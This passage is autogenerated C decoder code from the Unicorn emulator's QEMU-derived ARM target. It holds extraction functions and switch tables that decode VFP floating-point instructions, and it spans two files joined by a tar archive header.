0x3: /* 11111110 1.11.... ....1010 .1.0.... */ switch ((insn >> 18) & 0x3) { case 0x2: /* 11111110 1.1110.. ....1010 .1.0.... */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_4(ctx, &u.f_disas_vfp_uncond2, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* 11111110 1.1110.. ....1010 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:58 */ if (trans_VRINT(ctx, &u.f_disas_vfp_uncond2)) return true; return false; } return false; case 0x3: /* 11111110 1.1111.. ....1010 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:64 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_6(ctx, &u.f_disas_vfp_uncond3, insn); if (trans_VCVT(ctx, &u.f_disas_vfp_uncond3)) return true; return false; } return false; } return false; case 0xfe800b00: /* 11111110 1....... ....1011 .0.0.... */ disas_vfp_uncond_extract_vfp_dnm_d(ctx, &u.f_disas_vfp_uncond0, insn); switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1011 .0.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:55 */ if (trans_VMAXNM_dp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; } return false; case 0xfe800b40: /* 11111110 1....... ....1011 .1.0.... */ switch ((insn >> 20) & 0x3) { case 0x0: /* 11111110 1.00.... ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:56 */ disas_vfp_uncond_extract_vfp_dnm_d(ctx, &u.f_disas_vfp_uncond0, insn); if (trans_VMINNM_dp(ctx, &u.f_disas_vfp_uncond0)) return true; return false; case 0x3: /* 11111110 1.11.... ....1011 .1.0.... */ switch ((insn >> 18) & 0x3) { case 0x2: /* 11111110 1.1110.. ....1011 .1.0.... */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_5(ctx, &u.f_disas_vfp_uncond2, insn); switch ((insn >> 7) & 0x1) { case 0x0: /* 11111110 1.1110.. ....1011 01.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:60 */ if (trans_VRINT(ctx, &u.f_disas_vfp_uncond2)) return true; return false; } return false; case 0x3: /* 11111110 1.1111.. ....1011 .1.0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp-uncond.decode:66 */ disas_vfp_uncond_extract_disas_vfp_uncond_Fmt_7(ctx, &u.f_disas_vfp_uncond3, insn); if (trans_VCVT(ctx, &u.f_disas_vfp_uncond3)) return true; return false; } return false; } return false; } return false; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-vfp.inc.c������������������������������������������������������0000664�0000000�0000000�00000160765�14675241067�0021167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int vd; int vm; int vn; } arg_disas_vfp0; typedef struct { int vd; int vm; } arg_disas_vfp1; typedef struct { int imm; int vd; } arg_disas_vfp10; typedef struct { int e; int vd; int vm; int z; } arg_disas_vfp11; typedef struct { int t; int vd; int vm; } arg_disas_vfp12; typedef struct { int s; int vd; int vm; } arg_disas_vfp13; typedef struct { int imm; int opc; int vd; } arg_disas_vfp14; typedef struct { int rz; int s; int vd; int vm; } arg_disas_vfp15; typedef struct { int l; int rn; } arg_disas_vfp16; typedef struct { int index; int rt; int size; int u; int vn; } arg_disas_vfp2; typedef struct { int index; int rt; int size; int vn; } arg_disas_vfp3; typedef struct { int b; int e; int q; int rt; int vn; } arg_disas_vfp4; typedef struct { int l; int reg; int rt; } arg_disas_vfp5; typedef struct { int l; int rt; int vn; } arg_disas_vfp6; typedef struct { int op; int rt; int rt2; int vm; } arg_disas_vfp7; typedef struct { int imm; int l; int rn; int u; int vd; } arg_disas_vfp8; typedef struct { int imm; int l; int p; int rn; int u; int vd; int w; } arg_disas_vfp9; typedef arg_disas_vfp2 arg_VMOV_to_gp; static bool trans_VMOV_to_gp(DisasContext *ctx, arg_VMOV_to_gp *a); typedef arg_disas_vfp3 arg_VMOV_from_gp; static bool trans_VMOV_from_gp(DisasContext *ctx, arg_VMOV_from_gp *a); typedef arg_disas_vfp4 arg_VDUP; static bool trans_VDUP(DisasContext *ctx, arg_VDUP *a); typedef arg_disas_vfp5 arg_VMSR_VMRS; static bool trans_VMSR_VMRS(DisasContext *ctx, arg_VMSR_VMRS *a); typedef arg_disas_vfp6 arg_VMOV_single; static bool trans_VMOV_single(DisasContext *ctx, arg_VMOV_single *a); typedef arg_disas_vfp7 arg_VMOV_64_sp; static bool trans_VMOV_64_sp(DisasContext *ctx, arg_VMOV_64_sp *a); typedef arg_disas_vfp7 arg_VMOV_64_dp; static bool trans_VMOV_64_dp(DisasContext *ctx, arg_VMOV_64_dp *a); typedef arg_disas_vfp8 arg_VLDR_VSTR_sp; static bool trans_VLDR_VSTR_sp(DisasContext *ctx, arg_VLDR_VSTR_sp *a); typedef arg_disas_vfp8 arg_VLDR_VSTR_dp; static bool trans_VLDR_VSTR_dp(DisasContext *ctx, arg_VLDR_VSTR_dp *a); typedef arg_disas_vfp9 arg_VLDM_VSTM_sp; static bool trans_VLDM_VSTM_sp(DisasContext *ctx, arg_VLDM_VSTM_sp *a); typedef arg_disas_vfp9 arg_VLDM_VSTM_dp; static bool trans_VLDM_VSTM_dp(DisasContext *ctx, arg_VLDM_VSTM_dp *a); typedef arg_disas_vfp0 arg_VMLA_sp; static bool trans_VMLA_sp(DisasContext *ctx, arg_VMLA_sp *a); typedef arg_disas_vfp0 arg_VMLA_dp; static bool trans_VMLA_dp(DisasContext *ctx, arg_VMLA_dp *a); typedef arg_disas_vfp0 arg_VMLS_sp; static bool trans_VMLS_sp(DisasContext *ctx, arg_VMLS_sp *a); typedef arg_disas_vfp0 arg_VMLS_dp; static bool trans_VMLS_dp(DisasContext *ctx, arg_VMLS_dp *a); typedef arg_disas_vfp0 arg_VNMLS_sp; static bool trans_VNMLS_sp(DisasContext *ctx, arg_VNMLS_sp *a); typedef arg_disas_vfp0 arg_VNMLS_dp; static bool trans_VNMLS_dp(DisasContext *ctx, arg_VNMLS_dp *a); typedef arg_disas_vfp0 arg_VNMLA_sp; static bool trans_VNMLA_sp(DisasContext *ctx, arg_VNMLA_sp *a); typedef arg_disas_vfp0 arg_VNMLA_dp; static bool trans_VNMLA_dp(DisasContext *ctx, arg_VNMLA_dp *a); typedef arg_disas_vfp0 arg_VMUL_sp; static bool trans_VMUL_sp(DisasContext *ctx, arg_VMUL_sp *a); typedef arg_disas_vfp0 arg_VMUL_dp; static bool trans_VMUL_dp(DisasContext *ctx, arg_VMUL_dp *a); typedef arg_disas_vfp0 arg_VNMUL_sp; static bool trans_VNMUL_sp(DisasContext *ctx, arg_VNMUL_sp *a); typedef arg_disas_vfp0 arg_VNMUL_dp; static bool trans_VNMUL_dp(DisasContext *ctx, arg_VNMUL_dp *a); typedef arg_disas_vfp0 arg_VADD_sp; static bool trans_VADD_sp(DisasContext *ctx, arg_VADD_sp *a); typedef arg_disas_vfp0 arg_VADD_dp; static bool trans_VADD_dp(DisasContext *ctx, arg_VADD_dp *a); typedef arg_disas_vfp0 arg_VSUB_sp; static bool trans_VSUB_sp(DisasContext *ctx, arg_VSUB_sp *a); typedef arg_disas_vfp0 arg_VSUB_dp; static bool trans_VSUB_dp(DisasContext *ctx, arg_VSUB_dp *a); typedef arg_disas_vfp0 arg_VDIV_sp; static bool trans_VDIV_sp(DisasContext *ctx, arg_VDIV_sp *a); typedef arg_disas_vfp0 arg_VDIV_dp; static bool trans_VDIV_dp(DisasContext *ctx, arg_VDIV_dp *a); typedef arg_disas_vfp0 arg_VFMA_sp; static bool trans_VFMA_sp(DisasContext *ctx, arg_VFMA_sp *a); typedef arg_disas_vfp0 arg_VFMS_sp; static bool trans_VFMS_sp(DisasContext *ctx, arg_VFMS_sp *a); typedef arg_disas_vfp0 arg_VFNMA_sp; static bool trans_VFNMA_sp(DisasContext *ctx, arg_VFNMA_sp *a); typedef arg_disas_vfp0 arg_VFNMS_sp; static bool trans_VFNMS_sp(DisasContext *ctx, arg_VFNMS_sp *a); typedef arg_disas_vfp0 arg_VFMA_dp; static bool trans_VFMA_dp(DisasContext *ctx, arg_VFMA_dp *a); typedef arg_disas_vfp0 arg_VFMS_dp; static bool trans_VFMS_dp(DisasContext *ctx, arg_VFMS_dp *a); typedef arg_disas_vfp0 arg_VFNMA_dp; static bool trans_VFNMA_dp(DisasContext *ctx, arg_VFNMA_dp *a); typedef arg_disas_vfp0 arg_VFNMS_dp; static bool trans_VFNMS_dp(DisasContext *ctx, arg_VFNMS_dp *a); typedef arg_disas_vfp10 arg_VMOV_imm_sp; static bool trans_VMOV_imm_sp(DisasContext *ctx, arg_VMOV_imm_sp *a); typedef arg_disas_vfp10 arg_VMOV_imm_dp; static bool trans_VMOV_imm_dp(DisasContext *ctx, arg_VMOV_imm_dp *a); typedef arg_disas_vfp1 arg_VMOV_reg_sp; static bool trans_VMOV_reg_sp(DisasContext *ctx, arg_VMOV_reg_sp *a); typedef arg_disas_vfp1 arg_VMOV_reg_dp; static bool trans_VMOV_reg_dp(DisasContext *ctx, arg_VMOV_reg_dp *a); typedef arg_disas_vfp1 arg_VABS_sp; static bool trans_VABS_sp(DisasContext *ctx, arg_VABS_sp *a); typedef arg_disas_vfp1 arg_VABS_dp; static bool trans_VABS_dp(DisasContext *ctx, arg_VABS_dp *a); typedef arg_disas_vfp1 arg_VNEG_sp; static bool trans_VNEG_sp(DisasContext *ctx, arg_VNEG_sp *a); typedef arg_disas_vfp1 arg_VNEG_dp; static bool trans_VNEG_dp(DisasContext *ctx, arg_VNEG_dp *a); typedef arg_disas_vfp1 arg_VSQRT_sp; static bool trans_VSQRT_sp(DisasContext *ctx, arg_VSQRT_sp *a); typedef arg_disas_vfp1 arg_VSQRT_dp; static bool trans_VSQRT_dp(DisasContext *ctx, arg_VSQRT_dp *a); typedef arg_disas_vfp11 arg_VCMP_sp; static bool trans_VCMP_sp(DisasContext *ctx, arg_VCMP_sp *a); typedef arg_disas_vfp11 arg_VCMP_dp; static bool trans_VCMP_dp(DisasContext *ctx, arg_VCMP_dp *a); typedef arg_disas_vfp12 arg_VCVT_f32_f16; static bool trans_VCVT_f32_f16(DisasContext *ctx, arg_VCVT_f32_f16 *a); typedef arg_disas_vfp12 arg_VCVT_f64_f16; static bool trans_VCVT_f64_f16(DisasContext *ctx, arg_VCVT_f64_f16 *a); typedef arg_disas_vfp12 arg_VCVT_f16_f32; static bool trans_VCVT_f16_f32(DisasContext *ctx, arg_VCVT_f16_f32 *a); typedef arg_disas_vfp12 arg_VCVT_f16_f64; static bool trans_VCVT_f16_f64(DisasContext *ctx, arg_VCVT_f16_f64 *a); typedef arg_disas_vfp1 arg_VRINTR_sp; static bool trans_VRINTR_sp(DisasContext *ctx, arg_VRINTR_sp *a); typedef arg_disas_vfp1 arg_VRINTR_dp; static bool trans_VRINTR_dp(DisasContext *ctx, arg_VRINTR_dp *a); typedef arg_disas_vfp1 arg_VRINTZ_sp; static bool trans_VRINTZ_sp(DisasContext *ctx, arg_VRINTZ_sp *a); typedef arg_disas_vfp1 arg_VRINTZ_dp; static bool trans_VRINTZ_dp(DisasContext *ctx, arg_VRINTZ_dp *a); typedef arg_disas_vfp1 arg_VRINTX_sp; static bool trans_VRINTX_sp(DisasContext *ctx, arg_VRINTX_sp *a); typedef arg_disas_vfp1 arg_VRINTX_dp; static bool trans_VRINTX_dp(DisasContext *ctx, arg_VRINTX_dp *a); typedef arg_disas_vfp1 arg_VCVT_sp; static bool trans_VCVT_sp(DisasContext *ctx, arg_VCVT_sp *a); typedef arg_disas_vfp1 arg_VCVT_dp; static bool trans_VCVT_dp(DisasContext *ctx, arg_VCVT_dp *a); typedef arg_disas_vfp13 arg_VCVT_int_sp; static bool trans_VCVT_int_sp(DisasContext *ctx, arg_VCVT_int_sp *a); typedef arg_disas_vfp13 arg_VCVT_int_dp; static bool trans_VCVT_int_dp(DisasContext *ctx, arg_VCVT_int_dp *a); typedef arg_disas_vfp1 arg_VJCVT; static bool trans_VJCVT(DisasContext *ctx, arg_VJCVT *a); typedef arg_disas_vfp14 arg_VCVT_fix_sp; static bool trans_VCVT_fix_sp(DisasContext *ctx, arg_VCVT_fix_sp *a); typedef arg_disas_vfp14 arg_VCVT_fix_dp; static bool trans_VCVT_fix_dp(DisasContext *ctx, arg_VCVT_fix_dp *a); typedef arg_disas_vfp15 arg_VCVT_sp_int; static bool trans_VCVT_sp_int(DisasContext *ctx, arg_VCVT_sp_int *a); typedef arg_disas_vfp15 arg_VCVT_dp_int; static bool trans_VCVT_dp_int(DisasContext *ctx, arg_VCVT_dp_int *a); typedef arg_disas_vfp16 arg_VLLDM_VLSTM; static bool trans_VLLDM_VLSTM(DisasContext *ctx, arg_VLLDM_VLSTM *a); static void disas_vfp_extract_disas_vfp_Fmt_10(DisasContext *ctx, arg_disas_vfp3 *a, uint32_t insn) { a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 1; a->index = deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 21, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_11(DisasContext *ctx, arg_disas_vfp3 *a, uint32_t insn) { a->index = extract32(insn, 21, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 2; } static void disas_vfp_extract_disas_vfp_Fmt_12(DisasContext *ctx, arg_disas_vfp4 *a, uint32_t insn) { a->b = extract32(insn, 22, 1); a->q = extract32(insn, 21, 1); a->rt = extract32(insn, 12, 4); a->e = extract32(insn, 5, 1); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_13(DisasContext *ctx, arg_disas_vfp5 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->reg = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); } static void disas_vfp_extract_disas_vfp_Fmt_14(DisasContext *ctx, arg_disas_vfp6 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_15(DisasContext *ctx, arg_disas_vfp7 *a, uint32_t insn) { a->op = extract32(insn, 20, 1); a->rt2 = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_16(DisasContext *ctx, arg_disas_vfp7 *a, uint32_t insn) { a->op = extract32(insn, 20, 1); a->rt2 = extract32(insn, 16, 4); a->rt = extract32(insn, 12, 4); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_17(DisasContext *ctx, arg_disas_vfp8 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_18(DisasContext *ctx, arg_disas_vfp8 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_19(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->p = 0; a->u = 1; } static void disas_vfp_extract_disas_vfp_Fmt_20(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->w = extract32(insn, 21, 1); a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->p = 0; a->u = 1; } static void disas_vfp_extract_disas_vfp_Fmt_21(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->p = 1; a->u = 0; a->w = 1; } static void disas_vfp_extract_disas_vfp_Fmt_22(DisasContext *ctx, arg_disas_vfp9 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->imm = extract32(insn, 0, 8); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->p = 1; a->u = 0; a->w = 1; } static void disas_vfp_extract_disas_vfp_Fmt_23(DisasContext *ctx, arg_disas_vfp10 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 16, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_24(DisasContext *ctx, arg_disas_vfp10 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->imm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 16, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_25(DisasContext *ctx, arg_disas_vfp11 *a, uint32_t insn) { a->z = extract32(insn, 16, 1); a->e = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_26(DisasContext *ctx, arg_disas_vfp11 *a, uint32_t insn) { a->z = extract32(insn, 16, 1); a->e = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_27(DisasContext *ctx, arg_disas_vfp12 *a, uint32_t insn) { a->t = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_28(DisasContext *ctx, arg_disas_vfp12 *a, uint32_t insn) { a->t = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_29(DisasContext *ctx, arg_disas_vfp12 *a, uint32_t insn) { a->t = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_30(DisasContext *ctx, arg_disas_vfp13 *a, uint32_t insn) { a->s = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_31(DisasContext *ctx, arg_disas_vfp13 *a, uint32_t insn) { a->s = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_32(DisasContext *ctx, arg_disas_vfp14 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->imm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->opc = deposit32(deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 1)), 2, 30, extract32(insn, 18, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_33(DisasContext *ctx, arg_disas_vfp14 *a, uint32_t insn) { a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); a->imm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->opc = deposit32(deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 1)), 2, 30, extract32(insn, 18, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_34(DisasContext *ctx, arg_disas_vfp15 *a, uint32_t insn) { a->s = extract32(insn, 16, 1); a->rz = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); } static void disas_vfp_extract_disas_vfp_Fmt_35(DisasContext *ctx, arg_disas_vfp15 *a, uint32_t insn) { a->s = extract32(insn, 16, 1); a->rz = extract32(insn, 7, 1); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_36(DisasContext *ctx, arg_disas_vfp16 *a, uint32_t insn) { a->l = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); } static void disas_vfp_extract_disas_vfp_Fmt_6(DisasContext *ctx, arg_disas_vfp2 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 0; a->index = deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 21, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_7(DisasContext *ctx, arg_disas_vfp2 *a, uint32_t insn) { a->u = extract32(insn, 23, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 1; a->index = deposit32(extract32(insn, 6, 1), 1, 31, extract32(insn, 21, 1)); } static void disas_vfp_extract_disas_vfp_Fmt_8(DisasContext *ctx, arg_disas_vfp2 *a, uint32_t insn) { a->index = extract32(insn, 21, 1); a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 2; a->u = 0; } static void disas_vfp_extract_disas_vfp_Fmt_9(DisasContext *ctx, arg_disas_vfp3 *a, uint32_t insn) { a->rt = extract32(insn, 12, 4); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->size = 0; a->index = deposit32(extract32(insn, 5, 2), 2, 30, extract32(insn, 21, 1)); } static void disas_vfp_extract_vfp_dm_dd(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_vfp_dm_ds(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_vfp_dm_sd(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static void disas_vfp_extract_vfp_dm_ss(DisasContext *ctx, arg_disas_vfp1 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static void disas_vfp_extract_vfp_dnm_d(DisasContext *ctx, arg_disas_vfp0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 0, 4), 4, 28, extract32(insn, 5, 1)); a->vn = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 7, 1)); a->vd = deposit32(extract32(insn, 12, 4), 4, 28, extract32(insn, 22, 1)); } static void disas_vfp_extract_vfp_dnm_s(DisasContext *ctx, arg_disas_vfp0 *a, uint32_t insn) { a->vm = deposit32(extract32(insn, 5, 1), 1, 31, extract32(insn, 0, 4)); a->vn = deposit32(extract32(insn, 7, 1), 1, 31, extract32(insn, 16, 4)); a->vd = deposit32(extract32(insn, 22, 1), 1, 31, extract32(insn, 12, 4)); } static bool disas_vfp(DisasContext *ctx, uint32_t insn) { union { arg_disas_vfp0 f_disas_vfp0; arg_disas_vfp1 f_disas_vfp1; arg_disas_vfp10 f_disas_vfp10; arg_disas_vfp11 f_disas_vfp11; arg_disas_vfp12 f_disas_vfp12; arg_disas_vfp13 f_disas_vfp13; arg_disas_vfp14 f_disas_vfp14; arg_disas_vfp15 f_disas_vfp15; arg_disas_vfp16 f_disas_vfp16; arg_disas_vfp2 f_disas_vfp2; arg_disas_vfp3 f_disas_vfp3; arg_disas_vfp4 f_disas_vfp4; arg_disas_vfp5 f_disas_vfp5; arg_disas_vfp6 f_disas_vfp6; arg_disas_vfp7 f_disas_vfp7; arg_disas_vfp8 f_disas_vfp8; arg_disas_vfp9 f_disas_vfp9; } u; switch (insn & 0x0f000f00) { case 0x0c000a00: /* ....1100 ........ ....1010 ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....1100 0....... ....1010 ........ */ switch (insn & 0x006000d0) { case 0x00200000: /* ....1100 001..... ....1010 00.0.... */ disas_vfp_extract_disas_vfp_Fmt_36(ctx, &u.f_disas_vfp16, insn); switch (insn & 0xf000f02f) { case 0xe0000000: /* 11101100 001..... 00001010 00000000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:217 */ if (trans_VLLDM_VLSTM(ctx, &u.f_disas_vfp16)) return true; return false; } return false; case 0x00400010: /* ....1100 010..... ....1010 00.1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:79 */ disas_vfp_extract_disas_vfp_Fmt_15(ctx, &u.f_disas_vfp7, insn); if (trans_VMOV_64_sp(ctx, &u.f_disas_vfp7)) return true; return false; } return false; case 0x1: /* ....1100 1....... ....1010 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:95 */ disas_vfp_extract_disas_vfp_Fmt_19(ctx, &u.f_disas_vfp9, insn); if (trans_VLDM_VSTM_sp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; case 0x0c000b00: /* ....1100 ........ ....1011 ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* ....1100 0....... ....1011 ........ */ disas_vfp_extract_disas_vfp_Fmt_16(ctx, &u.f_disas_vfp7, insn); switch (insn & 0x006000d0) { case 0x00400010: /* ....1100 010..... ....1011 00.1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:80 */ if (trans_VMOV_64_dp(ctx, &u.f_disas_vfp7)) return true; return false; } return false; case 0x1: /* ....1100 1....... ....1011 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:97 */ disas_vfp_extract_disas_vfp_Fmt_20(ctx, &u.f_disas_vfp9, insn); if (trans_VLDM_VSTM_dp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; case 0x0d000a00: /* ....1101 ........ ....1010 ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....1101 ..0..... ....1010 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:84 */ disas_vfp_extract_disas_vfp_Fmt_17(ctx, &u.f_disas_vfp8, insn); if (trans_VLDR_VSTR_sp(ctx, &u.f_disas_vfp8)) return true; return false; case 0x1: /* ....1101 ..1..... ....1010 ........ */ disas_vfp_extract_disas_vfp_Fmt_21(ctx, &u.f_disas_vfp9, insn); switch ((insn >> 23) & 0x1) { case 0x0: /* ....1101 0.1..... ....1010 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:100 */ if (trans_VLDM_VSTM_sp(ctx, &u.f_disas_vfp9)) return true; return false; } return false; } return false; case 0x0d000b00: /* ....1101 ........ ....1011 ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* ....1101 ..0..... ....1011 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/vfp.decode:85 */ disas_vfp_extract_disas_vfp_Fmt_18(ctx, &u.f_disas_vfp8, insn); 